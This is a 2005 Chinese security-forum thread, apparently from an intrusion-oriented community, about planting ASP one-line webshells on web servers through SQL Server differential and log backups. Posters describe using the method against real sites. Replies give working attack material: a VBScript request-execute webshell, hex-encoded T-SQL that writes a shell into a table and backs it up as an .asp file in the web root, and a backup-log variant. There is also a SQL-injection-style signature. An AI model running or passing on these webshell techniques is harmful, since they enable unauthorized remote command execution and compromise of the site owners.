打印

[讨论]DB权限备份一句话木马问题

ck11

晶莹剔透§烈日灼然

Rank: 1

帖子: 6
精华: 0
积分: 23
阅读权限: 40
在线时间: 7 小时
注册时间: 2005-10-5
最后登录: 2006-4-1

发短消息
加为好友
当前离线

楼主大中小发表于 2005-10-10 17:33 只看该作者

[讨论]DB权限备份一句话木马问题

议题提交：ck11
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

在最近的入侵中。。我发现一个问题 DB权限备份差异传1句话木马
发现很多问题
1。DB差异备份上 http500错误最希望解决的
2。DB差异备份上出现ASP错误126 和 139
显示脚本缺少标记我用

复制内容到剪贴板

代码:

<script language="vbscript" runat="server">

execute request("l")

</script>

上传也是暴错
海洋也是
希望得到解答
[s:43]

1

TOP

fhod

运维管理组

Rank: 7 Rank: 7 Rank: 7 Rank: 7

E.S.T论坛版主

帖子: 906
精华: 16
积分: 7085
阅读权限: 150
性别: 男
在线时间: 537 小时
注册时间: 2004-12-6
最后登录: 2008-12-29

发短消息
加为好友
当前离线

沙发大中小发表于 2005-10-11 20:37 只看该作者

用xiaolu的那个试下..我一直都用那个
利用差异备份提高提高backupwebshell的成功率,减少文件大小
步骤:
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s

create table [dbo].[xiaolu] ([cmd] [image]);

insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)

declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT

0x77006F006B0061006F002E00620061006B00为wokao.bak
0x3C25657865637574652872657175657374282261222929253E是<%execute(request("a"))%>
0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000是e:\web\wokao.asp

TOP

ck11

晶莹剔透§烈日灼然

Rank: 1

帖子: 6
精华: 0
积分: 23
阅读权限: 40
在线时间: 7 小时
注册时间: 2005-10-5
最后登录: 2006-4-1

发短消息
加为好友
当前离线

椅子大中小发表于 2005-10-12 21:03 只看该作者

我就是用小路的。。。 backupwebshel2.0.....
不成功

1

TOP

橙子

晶莹剔透§烈日灼然

Rank: 1

帖子: 2
精华: 0
积分: 21
阅读权限: 40
在线时间: 7 小时
注册时间: 2005-7-24
最后登录: 2006-1-8

发短消息
加为好友
当前离线

板凳大中小发表于 2005-10-13 19:14 只看该作者

你们发现没有，有时备份出来的asp木马代码是分开的，不能用。500

TOP

ck11

晶莹剔透§烈日灼然

Rank: 1

帖子: 6
精华: 0
积分: 23
阅读权限: 40
在线时间: 7 小时
注册时间: 2005-10-5
最后登录: 2006-4-1

发短消息
加为好友
当前离线

地板大中小发表于 2005-10-13 21:17 只看该作者

恩但是我从来没上传成功过。。。不下20个站 10万名开外的。。。
是不是格式有问题？

1

TOP

逗号

晶莹剔透§烈日灼然

Rank: 1

帖子: 38
精华: 0
积分: 117
阅读权限: 40
在线时间: 32 小时
注册时间: 2005-10-16
最后登录: 2009-1-5

发短消息
加为好友
当前离线

6楼大中小发表于 2005-10-26 00:43 只看该作者

备份 SHELL 我就经常成功，用的一句话，也是本身自带的那个

TOP

kevin1986

荣誉会员

Rank: 6 Rank: 6 Rank: 6

E.S.T论坛贵宾

帖子: 325
精华: 12
积分: 3936
阅读权限: 100
性别: 男
在线时间: 308 小时
注册时间: 2005-2-5
最后登录: 2008-8-23

发短消息
加为好友
当前离线

7楼大中小发表于 2005-10-26 12:03 只看该作者

说实话还不如截断日志然后被份

me=\"kEvin1986\" & chr(0) & \"at solitude\" msgbox len(me) \' You can see somthing. msgbox me \' But just part of it. \'i think i will hide part of myself

TOP

nowthk

晶莹剔透§烈日灼然

Rank: 1

帖子: 104
精华: 4
积分: 510
阅读权限: 50
在线时间: 124 小时
注册时间: 2005-3-14
最后登录: 2007-4-12

发短消息
加为好友
当前离线

8楼大中小发表于 2005-10-27 17:13 只看该作者

引用:

下面是引用kevin1986于2005-10-26 12:03发表的:
说实话还不如截断日志然后被份

楼上说的让人开朗了好多，实战中好多备份出来的asp中都有未闭合的<%、还有一些无效的字符，如果截断的话，大大解决了这一大难题。
不过，怎么截断日志再进行备份，请楼上kevin1986祥解，谢谢 ^_^

\';update heart set love=\'nothing

\' where name=yaner;--

TOP

achen

晶莹剔透§烈日灼然

Rank: 1

帖子: 1
精华: 0
积分: 6
阅读权限: 40
性别: 男
在线时间: 0 小时
注册时间: 2005-10-22
最后登录: 2005-10-28

发短消息
加为好友
当前离线

9楼大中小发表于 2005-10-28 18:48 只看该作者

我也想知道。。
怎么截断日志
备份。。 [s:42] [s:42] [s:42]

TOP

kevin1986

荣誉会员

Rank: 6 Rank: 6 Rank: 6

E.S.T论坛贵宾

帖子: 325
精华: 12
积分: 3936
阅读权限: 100
性别: 男
在线时间: 308 小时
注册时间: 2005-2-5
最后登录: 2008-8-23

发短消息
加为好友
当前离线

10楼 大中小发表于 2005-10-29 00:30 只看该作者

其实所谓讨论的结果也就是让Backup出来的内容小一点嘛...
一个是Backup Database To Disk =
.另一个则是Backup log.....

我给个SQL语句得了,很早以前就知道了,但是感觉其实大家在原来的Backup Database上加一条语句就足够干净了的.

复制内容到剪贴板

代码:

use northwind;

--drop table lulu;

create table lulu(cmd image);

insert into lulu values(&#39;<%response.clear:execute request("a"):response.end%>&#39;);

backup log northwind to  disk=&#39;c:\\acci\\a.asp&#39; with init;

当然.你得先选好一个库才是.......

me=\"kEvin1986\" & chr(0) & \"at solitude\" msgbox len(me) \' You can see somthing. msgbox me \' But just part of it. \'i think i will hide part of myself

TOP

xmasfox

晶莹剔透§烈日灼然

Rank: 1

帖子: 29
精华: 0
积分: 48
阅读权限: 40
在线时间: 150 小时
注册时间: 2005-4-6
最后登录: 2008-9-13

发短消息
加为好友
当前离线

11楼 大中小发表于 2005-10-29 01:01 只看该作者

对SQL Server尽力限制对SQL Server的查询与存取操作。用户可以用最小权限查询sql server中的很多东西。若非必须不要给他们机会。否则是不安全的。 [s:46]

这就是签名？

TOP

kevin1986

荣誉会员

Rank: 6 Rank: 6 Rank: 6

E.S.T论坛贵宾

帖子: 325
精华: 12
积分: 3936
阅读权限: 100
性别: 男
在线时间: 308 小时
注册时间: 2005-2-5
最后登录: 2008-8-23

发短消息
加为好友
当前离线

12楼 大中小发表于 2005-10-29 03:01 只看该作者

现在的管理员似乎对SQL本身所带的权限不是很关心.
而在某些方面,这边的权限是我们所非常关心的......
同理可得比如WMI和注册表权限等....呵呵

me=\"kEvin1986\" & chr(0) & \"at solitude\" msgbox len(me) \' You can see somthing. msgbox me \' But just part of it. \'i think i will hide part of myself

TOP

zhouqing

晶莹剔透§烈日灼然

Rank: 1

帖子: 6
精华: 0
积分: 23
阅读权限: 40
在线时间: 5 小时
注册时间: 2005-9-7
最后登录: 2006-5-14

发短消息
加为好友
当前离线

13楼 大中小发表于 2005-11-3 13:06 只看该作者

截断日志的语句不怎么好用哈

TOP

zhouqing

晶莹剔透§烈日灼然

Rank: 1

帖子: 6
精华: 0
积分: 23
阅读权限: 40
在线时间: 5 小时
注册时间: 2005-9-7
最后登录: 2006-5-14

发短消息
加为好友
当前离线

14楼 大中小发表于 2005-11-3 13:07 只看该作者

Microsoft VBScript 编译器错误错误 '800a0408'

无效字符

/localinvite/meili.asp，行7384

j
-^

就是这样的了。。。。

TOP

person01

晶莹剔透§烈日灼然

Rank: 1

帖子: 10
精华: 0
积分: 43
阅读权限: 40
在线时间: 18 小时
注册时间: 2004-10-23
最后登录: 2009-1-9

发短消息
加为好友
当前离线

15楼 大中小发表于 2005-11-3 13:11 只看该作者

有的时候是不一定的成功的,特别对于一行大型的站点
而且狠毒时候都会出现500错误

TOP

zylcf007

晶莹剔透§烈日灼然

Rank: 1

帖子: 27
精华: 0
积分: 106
阅读权限: 40
在线时间: 38 小时
注册时间: 2005-7-30
最后登录: 2007-6-28

发短消息
加为好友
当前离线

16楼 大中小发表于 2005-11-25 14:30 只看该作者

什么差异备份，哪有详细资料？？？

我遇到的是ACCESS的数据库，还没碰到SQL的

郁闷~

想飞的小小鸟

TOP